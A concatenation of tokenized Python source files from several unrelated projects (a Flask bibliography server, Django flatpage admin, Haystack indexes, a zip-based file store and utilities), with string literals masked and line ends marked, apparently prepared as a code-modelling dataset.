= { } <EOL> spec [ "<STR_LIT:host>" ] = host or "<STR_LIT>" <EOL> if parent_node_name : <EOL> spec [ "<STR_LIT>" ] = parent_node_name <EOL> util . json_dump ( spec , spec_file ) <EOL> def get_node ( self , node_path , system , extra = None , name = None ) : <EOL> extra = extra or { } <EOL> node = self . node_cache . get ( node_path ) <EOL> if not node : <EOL> name = name or node_path [ len ( self . system_root ) + <NUM_LIT:1> : ] <EOL> node = Node ( self , system , name , node_path , extra = extra ) <EOL> self . node_cache [ node_path ] = node <EOL> return node <EOL> def get_system ( self , parent_system , name , current , level , extra ) : <EOL> key = ( "<STR_LIT>" , parent_system , name , current , level , tuple ( extra . items ( ) ) ) <EOL> system = self . node_cache . get ( key ) <EOL> if not system : <EOL> system = System ( parent_system , name , current , level , extra = extra ) <EOL> self . node_cache [ key ] = system <EOL> return system <EOL> def get_config ( self , pattern ) : <EOL> configs = list ( self . find_config ( pattern , all_configs = True , <EOL> full_match = True ) ) <EOL> if len ( configs ) == <NUM_LIT:0> : <EOL> raise errors . Error ( "<STR_LIT>" % ( pattern ) ) <EOL> elif len ( configs ) > <NUM_LIT:1> : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> pattern , "<STR_LIT:U+002CU+0020>" . join ( c . full_name for cn , c in configs ) ) ) <EOL> return configs [ <NUM_LIT:0> ] <EOL> def find_config ( self , pattern , all_configs = False , full_match = False ) : <EOL> key = ( pattern , all_configs , full_match ) <EOL> results = self . find_config_cache . get ( key ) <EOL> if not results : <EOL> results = list ( self . _find_config ( pattern , all_configs = all_configs , full_match = full_match ) ) <EOL> self . find_config_cache [ key ] = results <EOL> return results <EOL> def _find_config ( self , pattern , all_configs = False , full_match = False ) : <EOL> comparison = ConfigMatch ( pattern , full_match = full_match ) <EOL> for node in self . find ( "<STR_LIT:.>" ) : <EOL> if not comparison . match_node ( node . name ) : <EOL> continue <EOL> if all_configs : <EOL> find_method = node . iter_all_configs <EOL> else : <EOL> find_method = node . iter_configs <EOL> for conf in find_method ( ) : <EOL> if comparison . match_config ( conf . name ) : <EOL> yield node , conf <EOL> def find ( self , pattern , nodes = True , <EOL> systems = False , depth = None , full_match = False , exclude = None ) : <EOL> key = ( pattern , nodes , systems , tuple ( depth or [ ] ) , full_match , tuple ( exclude or [ ] ) ) <EOL> results = self . find_cache . get ( key ) <EOL> if not results : <EOL> results = list ( self . _find ( pattern , nodes = nodes , systems = systems , depth = depth , full_match = full_match , exclude = exclude ) ) <EOL> self . find_cache [ key ] = results <EOL> return results <EOL> def _find ( self , pattern , current = None , system = None , nodes = True , <EOL> systems = False , curr_depth = <NUM_LIT:0> , extra = None , depth = None , <EOL> full_match = False , exclude = None ) : <EOL> depth = depth or [ ] <EOL> extra = extra or { } <EOL> if not callable ( exclude ) : <EOL> if exclude : <EOL> exclude = re . compile ( exclude ) . search <EOL> else : <EOL> exclude = lambda name : False <EOL> pattern = pattern or "<STR_LIT>" <EOL> if isinstance ( pattern , string_types ) : <EOL> if full_match and not pattern . endswith ( "<STR_LIT:$>" ) : <EOL> pattern += "<STR_LIT:$>" <EOL> pattern = re . compile ( pattern or "<STR_LIT>" ) <EOL> match_op = pattern . match if full_match else pattern . search <EOL> current = current or self . system_root <EOL> node_conf_file = os . path . join ( current , NODE_CONF_FILE ) <EOL> name = current [ len ( self . system_root ) + <NUM_LIT:1> : ] <EOL> ok_depth = ( not depth ) or ( curr_depth in depth ) <EOL> if os . path . exists ( node_conf_file ) : <EOL> if nodes and match_op ( name ) and ok_depth and not exclude ( name ) : <EOL> yield self . get_node ( current , system , extra = extra ) <EOL> else : <EOL> subdirs = [ os . path . join ( current , entry ) for entry in os . listdir ( current ) ] <EOL> subdirs = sorted ( entry for entry in subdirs if os . path . isdir ( entry ) ) <EOL> system = self . get_system ( system , name , current , len ( subdirs ) , extra ) <EOL> if ( systems and ( current != self . system_root ) and ok_depth <EOL> and match_op ( name ) ) and not exclude ( name ) : <EOL> yield system <EOL> for sub_index , subdir in enumerate ( subdirs ) : <EOL> sub_depth = curr_depth + <NUM_LIT:1> <EOL> extra = dict ( index = sub_index , depth = sub_depth ) <EOL> for result in self . _find ( pattern , current = subdir , system = system , <EOL> nodes = nodes , systems = systems , <EOL> curr_depth = sub_depth , extra = extra , <EOL> exclude = exclude , <EOL> depth = depth , full_match = full_match ) : <EOL> yield result </s>
<s> from poni import util <EOL> import os <EOL> def test_dir_stats ( ) : <EOL> poni_src_dir = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> stats = util . dir_stats ( poni_src_dir ) <EOL> assert stats [ '<STR_LIT>' ] > <NUM_LIT:30> <EOL> assert stats [ '<STR_LIT>' ] > <NUM_LIT> <EOL> assert stats [ '<STR_LIT:path>' ] == poni_src_dir </s>
<s> from django import forms <EOL> from django . contrib import admin <EOL> from multilingual . flatpages . models import MultilingualFlatPage <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from multilingual . admin import MultilingualModelAdmin , MultilingualModelAdminForm <EOL> class MultilingualFlatpageForm ( MultilingualModelAdminForm ) : <EOL> url = forms . RegexField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:100> , regex = r'<STR_LIT>' , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> error_message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> class Meta : <EOL> model = MultilingualFlatPage <EOL> class MultilingualFlatPageAdmin ( MultilingualModelAdmin ) : <EOL> form = MultilingualFlatpageForm <EOL> use_fieldsets = ( <EOL> ( None , { '<STR_LIT>' : ( '<STR_LIT:title>' , '<STR_LIT:url>' , '<STR_LIT>' , '<STR_LIT:content>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ) <EOL> list_display = ( '<STR_LIT:url>' , '<STR_LIT:title>' ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> search_fields = ( '<STR_LIT:url>' , '<STR_LIT:title>' ) <EOL> admin . site . register ( MultilingualFlatPage , MultilingualFlatPageAdmin ) </s>
<s> from collections import defaultdict <EOL> from sekizai . data import UniqueSequence <EOL> from sekizai . helpers import get_varname <EOL> def sekizai ( request = None ) : <EOL> """<STR_LIT>""" <EOL> return { get_varname ( ) : defaultdict ( UniqueSequence ) } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import subprocess <EOL> import sys <EOL> def _parse_lines ( lines ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> acc = [ ] <EOL> for line in lines : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> acc . append ( line ) <EOL> elif line . startswith ( "<STR_LIT:U+0020>" ) and acc : <EOL> acc . append ( line ) <EOL> else : <EOL> if acc : <EOL> for i , l in enumerate ( reversed ( acc ) ) : <EOL> if l . startswith ( "<STR_LIT>" ) : <EOL> acc [ - ( <NUM_LIT:1> + i ) ] = "<STR_LIT:*>" + l <EOL> break <EOL> results . extend ( acc ) <EOL> acc = [ ] <EOL> results . append ( line ) <EOL> return results <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> args = [ '<STR_LIT>' ] <EOL> args . extend ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> p = subprocess . Popen ( args , stdin = subprocess . PIPE , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> _ , stdout = p . communicate ( ) <EOL> if ( sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> stdout = stdout . decode ( ) <EOL> result = _parse_lines ( stdout . splitlines ( ) ) <EOL> print ( "<STR_LIT:\n>" . join ( result ) ) </s>
<s> import os <EOL> import urllib2 <EOL> import unicodedata <EOL> import httplib <EOL> import json <EOL> import subprocess <EOL> from copy import deepcopy <EOL> from datetime import datetime <EOL> from flask import Flask , jsonify , json , request , redirect , abort , make_response <EOL> from flask import render_template , flash <EOL> from flask . views import View , MethodView <EOL> from flask . ext . login import login_user , current_user <EOL> import bibserver . dao <EOL> import bibserver . util as util <EOL> import bibserver . importer <EOL> import bibserver . ingest <EOL> from bibserver . config import config <EOL> from bibserver . core import app , login_manager <EOL> from bibserver . view . account import blueprint as account <EOL> from bibserver import auth <EOL> app . register_blueprint ( account , url_prefix = '<STR_LIT>' ) <EOL> @ login_manager . user_loader <EOL> def load_account_for_login_manager ( userid ) : <EOL> out = bibserver . dao . Account . get ( userid ) <EOL> return out <EOL> @ app . context_processor <EOL> def set_current_user ( ) : <EOL> """<STR_LIT>""" <EOL> return dict ( current_user = current_user ) <EOL> @ app . before_request <EOL> def standard_authentication ( ) : <EOL> """<STR_LIT>""" <EOL> remote_user = request . headers . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if remote_user : <EOL> user = bibserver . dao . Account . get ( remote_user ) <EOL> if user : <EOL> login_user ( user , remember = False ) <EOL> elif '<STR_LIT>' in request . values : <EOL> res = bibserver . dao . Account . query ( q = '<STR_LIT>' + request . values [ '<STR_LIT>' ] + '<STR_LIT:">' ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if len ( res ) == <NUM_LIT:1> : <EOL> user = bibserver . dao . Account . get ( res [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if user : <EOL> login_user ( user , remember = False ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def query ( path = '<STR_LIT>' ) : <EOL> pathparts = path . split ( '<STR_LIT:/>' ) <EOL> subpath = pathparts [ <NUM_LIT:0> ] <EOL> if subpath . lower ( ) == '<STR_LIT>' : <EOL> abort ( <NUM_LIT> ) <EOL> klass = getattr ( bibserver . dao , subpath [ <NUM_LIT:0> ] . capitalize ( ) + subpath [ <NUM_LIT:1> : ] ) <EOL> qs = request . query_string <EOL> if request . method == "<STR_LIT:POST>" : <EOL> qs += "<STR_LIT>" + json . dumps ( dict ( request . form ) . keys ( ) [ - <NUM_LIT:1> ] ) <EOL> if len ( pathparts ) > <NUM_LIT:1> and pathparts [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> resp = make_response ( json . dumps ( klass ( ) . get_mapping ( ) ) ) <EOL> else : <EOL> resp = make_response ( klass ( ) . raw_query ( qs ) ) <EOL> resp . mimetype = "<STR_LIT:application/json>" <EOL> return resp <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def content ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def home ( ) : <EOL> data = [ ] <EOL> try : <EOL> colldata = bibserver . dao . Collection . query ( sort = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } , size = <NUM_LIT:20> ) <EOL> if colldata [ '<STR_LIT>' ] [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> for coll in colldata [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> colln = bibserver . dao . Collection . get ( coll [ '<STR_LIT>' ] ) <EOL> if colln : <EOL> data . append ( { <EOL> '<STR_LIT:name>' : colln [ '<STR_LIT:label>' ] , <EOL> '<STR_LIT>' : len ( colln ) , <EOL> '<STR_LIT>' : colln [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : colln [ '<STR_LIT>' ] , <EOL> '<STR_LIT:description>' : colln [ '<STR_LIT:description>' ] <EOL> } ) <EOL> except : <EOL> pass <EOL> colls = bibserver . dao . Collection . query ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> records = bibserver . dao . Record . query ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> users = bibserver . dao . Account . query ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print data <EOL> return render_template ( '<STR_LIT>' , colldata = json . dumps ( data ) , colls = colls , records = records , users = users ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def users ( ) : <EOL> if current_user . is_anonymous ( ) : <EOL> abort ( <NUM_LIT> ) <EOL> users = bibserver . dao . Account . query ( sort = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } , size = <NUM_LIT> ) <EOL> if users [ '<STR_LIT>' ] [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> accs = [ bibserver . dao . Account . get ( i [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) for i in users [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] <EOL> users = [ ] <EOL> for acc in accs : <EOL> user = { "<STR_LIT>" : len ( acc . collections ) , "<STR_LIT>" : acc [ "<STR_LIT>" ] } <EOL> try : <EOL> user [ '<STR_LIT>' ] = acc [ '<STR_LIT>' ] <EOL> user [ '<STR_LIT:description>' ] = acc [ '<STR_LIT:description>' ] <EOL> except : <EOL> pass <EOL> users . append ( user ) <EOL> if util . request_wants_json ( ) : <EOL> resp = make_response ( json . dumps ( users , sort_keys = True , indent = <NUM_LIT:4> ) ) <EOL> resp . mimetype = "<STR_LIT:application/json>" <EOL> return resp <EOL> else : <EOL> return render_template ( '<STR_LIT>' , users = users ) <EOL> class UploadView ( MethodView ) : <EOL> def get ( self ) : <EOL> if not auth . collection . create ( current_user , None ) : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> if request . values . get ( "<STR_LIT:source>" ) is not None : <EOL> return self . post ( ) <EOL> return render_template ( '<STR_LIT>' , <EOL> parser_plugins = bibserver . ingest . get_plugins ( ) . values ( ) ) <EOL> def post ( self ) : <EOL> if not auth . collection . create ( current_user , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> try : <EOL> if not request . values . get ( '<STR_LIT>' , None ) : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> if not request . values . get ( '<STR_LIT:source>' , None ) : <EOL> if not request . files . get ( '<STR_LIT>' , None ) : <EOL> if not request . json : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> collection = request . values . get ( '<STR_LIT>' ) <EOL> format = request . values . get ( '<STR_LIT>' ) <EOL> if request . files . get ( '<STR_LIT>' ) : <EOL> fileobj = request . files . get ( '<STR_LIT>' ) <EOL> if not format : <EOL> format = bibserver . importer . findformat ( fileobj . filename ) <EOL> else : <EOL> if not format : <EOL> format = bibserver . importer . findformat ( request . values . get ( "<STR_LIT:source>" ) . strip ( '<STR_LIT:">' ) ) <EOL> ticket = bibserver . ingest . IngestTicket ( owner = current_user . id , <EOL> source_url = request . values . get ( "<STR_LIT:source>" ) , <EOL> format = format , <EOL> collection = request . values . get ( '<STR_LIT>' ) , <EOL> description = request . values . get ( '<STR_LIT:description>' ) , <EOL> ) <EOL> only_parse = request . values . get ( '<STR_LIT>' ) <EOL> if only_parse : <EOL> ticket [ '<STR_LIT>' ] = True <EOL> license = request . values . get ( '<STR_LIT>' ) <EOL> if license : ticket [ '<STR_LIT>' ] = license <EOL> if request . files . get ( '<STR_LIT>' ) : <EOL> data = fileobj . read ( ) <EOL> ticket [ '<STR_LIT>' ] = bibserver . ingest . store_data_in_cache ( data ) <EOL> ticket [ '<STR_LIT>' ] = config . get ( '<STR_LIT>' , '<STR_LIT>' ) + '<STR_LIT>' % ticket . id <EOL> ticket [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> if request . json : <EOL> data = request . json <EOL> ticket [ '<STR_LIT>' ] = bibserver . ingest . store_data_in_cache ( json . dumps ( data ) ) <EOL> ticket [ '<STR_LIT>' ] = config . get ( '<STR_LIT>' , '<STR_LIT>' ) + '<STR_LIT>' % ticket . id <EOL> ticket [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> ticket . save ( ) <EOL> except Exception , inst : <EOL> msg = str ( inst ) <EOL> if app . debug or app . config [ '<STR_LIT>' ] : <EOL> raise <EOL> flash ( '<STR_LIT>' + msg ) <EOL> return render_template ( '<STR_LIT>' ) <EOL> else : <EOL> return redirect ( '<STR_LIT>' + ticket . id ) <EOL> class CreateView ( MethodView ) : <EOL> def get ( self ) : <EOL> if not auth . collection . create ( current_user , None ) : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> if request . values . get ( "<STR_LIT:source>" ) is not None : <EOL> return self . post ( ) <EOL> return render_template ( '<STR_LIT>' ) <EOL> def post ( self ) : <EOL> if not auth . collection . create ( current_user , None ) : <EOL> abort ( <NUM_LIT> ) <EOL> coll = { <EOL> '<STR_LIT:label>' : request . values . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : request . values . get ( '<STR_LIT>' ) <EOL> } <EOL> i = bibserver . importer . Importer ( current_user ) <EOL> collection , records = i . index ( coll , { } ) <EOL> return redirect ( collection [ '<STR_LIT>' ] + '<STR_LIT:/>' + collection [ '<STR_LIT>' ] ) <EOL> class NoUploadOrCreate ( MethodView ) : <EOL> def get ( self ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> def post ( self ) : <EOL> abort ( <NUM_LIT> ) <EOL> if config [ "<STR_LIT>" ] : <EOL> app . add_url_rule ( '<STR_LIT>' , view_func = UploadView . as_view ( '<STR_LIT>' ) ) <EOL> app . add_url_rule ( '<STR_LIT>' , view_func = CreateView . as_view ( '<STR_LIT>' ) ) <EOL> else : <EOL> app . add_url_rule ( '<STR_LIT>' , view_func = NoUploadOrCreate . as_view ( '<STR_LIT>' ) ) <EOL> app . add_url_rule ( '<STR_LIT>' , view_func = NoUploadOrCreate . as_view ( '<STR_LIT>' ) ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> def note ( nid = '<STR_LIT>' ) : <EOL> if current_user . is_anonymous ( ) : <EOL> abort ( <NUM_LIT> ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> newnote = bibserver . dao . Note ( ) <EOL> newnote . data = request . json <EOL> newnote . save ( ) <EOL> return redirect ( '<STR_LIT>' + newnote . id ) <EOL> elif request . method == '<STR_LIT>' : <EOL> note = bibserver . dao . Note . get ( nid ) <EOL> note . delete ( ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> else : <EOL> thenote = bibserver . dao . Note . get ( nid ) <EOL> if thenote : <EOL> resp = make_response ( json . dumps ( thenote . data , sort_keys = True , indent = <NUM_LIT:4> ) ) <EOL> resp . mimetype = "<STR_LIT:application/json>" <EOL> return resp <EOL> else : <EOL> abort ( <NUM_LIT> ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> def default ( path ) : <EOL> import bibserver . search <EOL> searcher = bibserver . search . Search ( path = path , current_user = current_user ) <EOL> return searcher . find ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if config [ "<STR_LIT>" ] : <EOL> bibserver . ingest . init ( ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> ingest = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . write ( '<STR_LIT:%s>' % ingest . pid ) <EOL> try : <EOL> bibserver . dao . init_db ( ) <EOL> app . run ( host = '<STR_LIT>' , debug = config [ '<STR_LIT>' ] , port = config [ '<STR_LIT:port>' ] ) <EOL> finally : <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> os . remove ( '<STR_LIT>' ) </s>
<s> from django . views . generic . base import TemplateView <EOL> class JobListView ( TemplateView ) : <EOL> template_name = "<STR_LIT>" <EOL> class JobHelperView ( TemplateView ) : <EOL> template_name = "<STR_LIT>" </s>
<s> from haystack import indexes <EOL> from . models import PressRelease , PressMention <EOL> class PressReleaseIndex ( indexes . SearchIndex , indexes . Indexable ) : <EOL> text = indexes . CharField ( document = True , use_template = True ) <EOL> def get_model ( self ) : <EOL> return PressRelease <EOL> def get_updated_field ( self ) : <EOL> return '<STR_LIT>' <EOL> def index_queryset ( self , using = None ) : <EOL> return self . get_model ( ) . published_objects . all ( ) <EOL> class PressMentionIndex ( indexes . SearchIndex , indexes . Indexable ) : <EOL> text = indexes . CharField ( document = True , use_template = True ) <EOL> publisher = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> url = indexes . CharField ( model_attr = '<STR_LIT:url>' ) <EOL> def get_model ( self ) : <EOL> return PressMention <EOL> def get_updated_field ( self ) : <EOL> return '<STR_LIT>' <EOL> def index_queryset ( self , using = None ) : <EOL> return self . get_model ( ) . published_objects . all ( ) </s>
<s> from ofs . local . zipfile import ZipFile , BadZipfile , LargeZipFile , ZIP_STORED , ZIP_DEFLATED , is_zipfile <EOL> from ofs . base import BucketExists , OFSException , OFSInterface , OFSFileNotFound <EOL> from pairtree import ppath <EOL> import hashlib <EOL> from datetime import datetime <EOL> from tempfile import mkstemp <EOL> from uuid import uuid4 <EOL> import os <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class NoSuchZipArchive ( OFSException ) : <EOL> pass <EOL> class BadZipArchive ( OFSException ) : <EOL> pass <EOL> MD_FILE = "<STR_LIT>" <EOL> class ZOFS ( OFSInterface ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , zipfile , mode = "<STR_LIT:r>" , compression = ZIP_STORED , allowZip64 = False , hashing_type = "<STR_LIT>" , quiet = False ) : <EOL> """<STR_LIT>""" <EOL> if mode not in ( "<STR_LIT:r>" , "<STR_LIT:w>" , "<STR_LIT:a>" ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if mode in ( "<STR_LIT:w>" , "<STR_LIT:a>" ) and not quiet : <EOL> print "<STR_LIT>" % mode <EOL> self . zipfile = zipfile <EOL> self . mode = mode <EOL> self . compression = compression <EOL> self . allowZip64 = allowZip64 <EOL> self . hashing_type = hashing_type <EOL> self . quiet = quiet <EOL> if mode == "<STR_LIT:r>" and not is_zipfile ( zipfile ) : <EOL> raise BadZipArchive , e <EOL> try : <EOL> self . z = ZipFile ( self . zipfile , self . mode , self . compression , self . allowZip64 ) <EOL> except BadZipfile , e : <EOL> print "<STR_LIT>" % zipfile <EOL> print "<STR_LIT>" % e <EOL> raise BadZipArchive , e <EOL> except LargeZipFile , e : <EOL> print "<STR_LIT>" <EOL> raise BadZipArchive , e <EOL> def _write ( self , z , bucket , label , stream ) : <EOL> name = self . _zf ( bucket , label ) <EOL> if self . hashing_type != None : <EOL> hash_gen = getattr ( hashlib , self . hashing_type ) ( ) <EOL> if hasattr ( stream , '<STR_LIT>' ) : <EOL> size = <NUM_LIT:0> <EOL> fd , filename = mkstemp ( ) <EOL> f = os . fdopen ( fd , "<STR_LIT:wb>" ) <EOL> chunk = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> while chunk : <EOL> f . write ( chunk ) <EOL> size = size + len ( chunk ) <EOL> if self . hashing_type != None : <EOL> hash_gen . update ( chunk ) <EOL> chunk = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> f . close ( ) <EOL> z . write ( filename , name ) <EOL> os . remove ( filename ) <EOL> else : <EOL> if self . hashing_type != None : <EOL> hash_gen . update ( stream ) <EOL> size = len ( stream ) <EOL> z . writestr ( name , stream ) <EOL> if self . hashing_type != None : <EOL> return size , '<STR_LIT>' % ( self . hashing_type , hash_gen . hexdigest ( ) ) <EOL> return size , "<STR_LIT>" <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> self . z . close ( ) <EOL> def _zf ( self , bucket , label ) : <EOL> return "<STR_LIT:/>" . join ( ( ppath . id_encode ( bucket ) , label ) ) <EOL> def _nf ( self , name ) : <EOL> enc_bucket , label = name . split ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> return ( ppath . id_decode ( enc_bucket ) , label ) <EOL> def exists ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> fn = self . _zf ( bucket , label ) <EOL> try : <EOL> self . z . getinfo ( fn ) <EOL> return True <EOL> except KeyError : <EOL> return False <EOL> def claim_bucket ( self , bucket = None ) : <EOL> '''<STR_LIT>''' <EOL> if bucket : <EOL> return bucket <EOL> else : <EOL> return uuid4 ( ) . hex <EOL> def list_labels ( self , bucket ) : <EOL> '''<STR_LIT>''' <EOL> for name in self . z . namelist ( ) : <EOL> container , label = self . _nf ( name . encode ( "<STR_LIT:utf-8>" ) ) <EOL> if container == bucket and label != MD_FILE : <EOL> yield label <EOL> def list_buckets ( self ) : <EOL> '''<STR_LIT>''' <EOL> buckets = set ( ) <EOL> for name in self . z . namelist ( ) : <EOL> bucket , _ = self . _nf ( name ) <EOL> if bucket not in buckets : <EOL> buckets . add ( bucket ) <EOL> yield bucket <EOL> def get_stream ( self , bucket , label , as_stream = True ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode == "<STR_LIT:w>" : <EOL> raise OFSException , "<STR_LIT>" <EOL> elif self . exists ( bucket , label ) : <EOL> fn = self . _zf ( bucket , label ) <EOL> if as_stream : <EOL> return self . z . open ( fn ) <EOL> else : <EOL> return self . z . read ( fn ) <EOL> else : <EOL> raise OFSFileNotFound <EOL> def get_url ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . exists ( bucket , label ) : <EOL> root = "<STR_LIT>" % os . path . abspath ( self . zipfile ) <EOL> fn = self . _zf ( bucket , label ) <EOL> return "<STR_LIT>" . join ( root , fn ) <EOL> else : <EOL> raise OFSFileNotFound <EOL> def put_stream ( self , bucket , label , stream_object , params = { } , replace = True , add_md = True ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode == "<STR_LIT:r>" : <EOL> raise OFSException , "<STR_LIT>" <EOL> else : <EOL> fn = self . _zf ( bucket , label ) <EOL> params [ '<STR_LIT>' ] = datetime . now ( ) . isoformat ( ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> params [ '<STR_LIT>' ] = label <EOL> if self . exists ( bucket , label ) and replace == True : <EOL> zinfo = self . z . getinfo ( fn ) <EOL> size , chksum = self . _write ( self . z , bucket , label , stream_object ) <EOL> self . _del_stream ( zinfo ) <EOL> params [ '<STR_LIT>' ] = size <EOL> if chksum : <EOL> params [ '<STR_LIT>' ] = chksum <EOL> else : <EOL> size , chksum = self . _write ( self . z , bucket , label , stream_object ) <EOL> params [ '<STR_LIT>' ] = size <EOL> if chksum : <EOL> params [ '<STR_LIT>' ] = chksum <EOL> if add_md : <EOL> params = self . update_metadata ( bucket , label , params ) <EOL> return params <EOL> def _del_stream ( self , zinfo ) : <EOL> print "<STR_LIT>" <EOL> pass <EOL> def del_stream ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . exists ( bucket , label ) : <EOL> name = self . _zf ( bucket , label ) <EOL> self . _del_stream ( name ) <EOL> def _get_bucket_md ( self , bucket ) : <EOL> name = self . _zf ( bucket , MD_FILE ) <EOL> if not self . exists ( bucket , MD_FILE ) : <EOL> raise OFSFileNotFound <EOL> if self . mode != "<STR_LIT:w>" : <EOL> json_doc = self . z . read ( name ) <EOL> try : <EOL> jsn = json . loads ( json_doc ) <EOL> return jsn <EOL> except ValueError : <EOL> raise OFSException , "<STR_LIT>" % bucket <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def get_metadata ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:w>" : <EOL> try : <EOL> jsn = self . _get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> return { } <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if jsn . has_key ( label ) : <EOL> return jsn [ label ] <EOL> else : <EOL> return { } <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def update_metadata ( self , bucket , label , params ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:r>" : <EOL> try : <EOL> payload = self . _get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> payload = { } <EOL> for l in self . list_labels ( bucket ) : <EOL> payload [ l ] = { } <EOL> payload [ l ] [ '<STR_LIT>' ] = l <EOL> if not self . quiet : <EOL> print "<STR_LIT>" % bucket <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if not payload . has_key ( label ) : <EOL> payload [ label ] = { } <EOL> payload [ label ] . update ( params ) <EOL> self . put_stream ( bucket , MD_FILE , json . dumps ( payload ) , params = { } , replace = True , add_md = False ) <EOL> return payload [ label ] <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def del_metadata_keys ( self , bucket , label , keys ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:r>" : <EOL> try : <EOL> payload = self . _get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> raise OFSFileNotFound , "<STR_LIT>" % bucket <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if payload . has_key ( label ) : <EOL> for key in [ x for x in keys if payload [ label ] . has_key ( x ) ] : <EOL> del payload [ label ] [ key ] <EOL> self . put_stream ( bucket , MD_FILE , json . dumps ( payload ) , params = { } , replace = True , add_md = False ) <EOL> else : <EOL> raise OFSException , "<STR_LIT>" </s>
